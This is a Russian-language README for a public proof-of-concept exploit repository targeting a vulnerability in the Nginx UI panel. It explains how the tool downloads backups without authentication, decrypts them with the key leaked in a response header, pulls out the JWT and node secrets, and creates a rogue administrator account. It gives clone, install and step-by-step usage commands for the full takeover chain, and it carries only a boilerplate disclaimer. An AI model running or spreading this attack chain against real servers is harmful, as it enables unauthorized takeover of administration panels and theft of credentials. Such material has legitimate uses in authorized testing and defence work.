
Автоматический эксплойт для CVE-2026-27944 в Nginx UI: загружает и расшифровывает резервные копии, извлекает секреты и создаёт поддельные учётные записи администратора для полного захвата панели управления.
Этот репозиторий содержит расширенный Proof of Concept (POC) эксплойт для CVE-2026-27944 — критической уязвимости в Nginx UI.
Уязвимость позволяет неавторизованному злоумышленнику загружать системные резервные копии через конечную точку /api/backup. Кроме того, приложение раскрывает ключ шифрования AES-256 и IV в HTTP-заголовке ответа X-Backup-Security, что позволяет злоумышленнику легко расшифровать загруженную резервную копию.
Этот расширенный POC автоматизирует всю цепочку атаки: загрузку резервной копии, расшифровку её содержимого, извлечение секретов конфигурации (таких как Node Secret и JWT Secret) и использование этих секретов для обхода аутентификации и создания мошеннической учётной записи администратора для полного захвата панели управления.
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Не используйте этот инструмент против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый данным скриптом.
X-Backup-Security для извлечения ключа AES и IV в кодировке Base64, а также расшифровка резервной копии (AES-256-CBC).app.ini для извлечения конфиденциальной информации:
X-Node-Secret) для взаимодействия с API и создания нового пользователя-администратора.pycryptodome (требуется для расшифровки AES)Клонируйте репозиторий:
git clone https://github.com/Skynoxk/CVE-2026-27944-POC.git
cd CVE-2026-27944-POC
Установите необходимые зависимости:
pip install pycryptodome
python exploit_enhanced.py --target <URL> [ОПЦИИ]
1. Только загрузка и расшифровка резервной копии:
python exploit_enhanced.py --target http://127.0.0.1:9000 --out backup.bin --decrypt
2. Загрузка, расшифровка и извлечение секретов конфигурации:
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --show-secrets
3. Полная цепочка эксплойта (загрузка, расшифровка, извлечение секретов и создание администратора):
python exploit_enhanced.py --target http://127.0.0.1:9000 --decrypt --create-user hacker --password Pwned@123!
Если флаг --create-user использован успешно, скрипт выведет подробные методы доступа к панели управления Nginx UI, включая:
authorization с использованием полученного JWT-токена.curl с использованием заголовка X-Node-Secret для обхода механизмов аутентификации.| Аргумент | Описание | По умолчанию |
|---|
--target | (Обязательно) Базовый URL экземпляра Nginx UI (например, http://127.0.0.1:9000) | |
--out | Путь к файлу для сохранения зашифрованной резервной копии | backup.bin |
--decrypt | Расшифровать загруженную резервную копию | False |
--extract-dir | Каталог для извлечения расшифрованных файлов | backup_extracted |
--show-secrets | Извлечь и отобразить конфиденциальные секреты из app.ini | False |
--create-user | Создать пользователя-администратора для доступа к панели управления (укажите имя пользователя) | |
--password | Пароль для созданного пользователя-администратора | Admin@123456 |